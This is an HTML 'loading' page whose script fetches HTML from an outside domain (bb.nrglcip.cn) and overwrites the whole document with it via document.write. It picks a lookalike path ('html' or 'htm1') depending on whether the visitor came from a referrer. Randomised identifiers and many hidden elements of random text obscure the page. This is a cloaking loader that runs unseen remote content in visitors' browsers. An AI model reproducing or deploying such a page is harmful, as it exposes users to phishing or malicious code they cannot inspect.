<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SJkBVBjn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SJkBVBjn .Rp35CaVwFoA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SJkBVBjn .content {
            line-height: 50px;
            text-align: center
        }

        .SJkBVBjn .img {
            width: 100%
        }

        .SJkBVBjn .MnYD57Iu {
            text-align: center
        }

        .SJkBVBjn .MnYD57Iu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SJkBVBjn .MnYD57Iu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SJkBVBjn .MnYD57Iu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SJkBVBjn .MnYD57Iu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SJkBVBjn .MnYD57Iu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SJkBVBjn .MnYD57Iu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SJkBVBjn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Kdajowui4c(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qIR3lt = Kdajowui4c('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qIR3lt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qIR3lt +".html?a=share";
		}
		
        ApZRnp=url+"#"+new Date().getTime();
        ApZRnp && function() {
            $.get(ApZRnp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>e8VBbOGlRN9quxw7bxoQACK09gbpvDhOknodpbT4UyfEAEDZQKNY85DyYKunGUVvOYXOY2AlGxpzzNxW5yKF3y4BkSZ9GemP</div>
<p  style='display:none'>TTNDS2wmIXx0De6AlyPzYmADtnArJanPErJfHjWXvh5pNKZzExWcJ</p>
<span style='display:none'>R1Ul6XbgN6dikuPSwrvfSXvJYI8PPUbUOmUKMtrTXo1nbn4iB0I0yn</span>
<li style='display:none' >I9Wxw7DjCbsLXrCJSbHHAsHFjnkQMa36NgWZMioJtpL2lnm7</li><div class="SJkBVBjn">
    <div class="Rp35CaVwFoA">
        <div class="MnYD57Iu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >bbdf3IVPniCSqy</h1>
<div style='display:none'>mjYqfjN3hAI0qjfYw6U201sWw74OUkDdCvJRwlgieYlotFSVfhMxMFyjMx8OavMCEHgoPJwqSJsUbqSzNYRx9bnS0MSLMdSew6W1o</div>
<img  src='' style='display:none'>
<ul style='display:none' >jepYnKSUN47anSBXM2ORGZI3OKZvOLvsA3S9YOa</ul>
<img  src='' style='display:none'>
<div style='display:none'>mjYqfjN3hAI0qjfYw6U201sWw74OUkDdCvJRwlgieYlotFSVfhMxMFyjMx8OavMCEHgoPJwqSJsUbqSzNYRx9bnS0MSLMdSew6W1o</div>
<span style='display:none'>aKtF3quGjLJtrP5nbv1uqZ560cE1EAik8iLHij93Gld0tIwLk3v4OW8Ynn3ePDnA6</span>
<ul style='display:none' >jepYnKSUN47anSBXM2ORGZI3OKZvOLvsA3S9YOa</ul></body>
</html>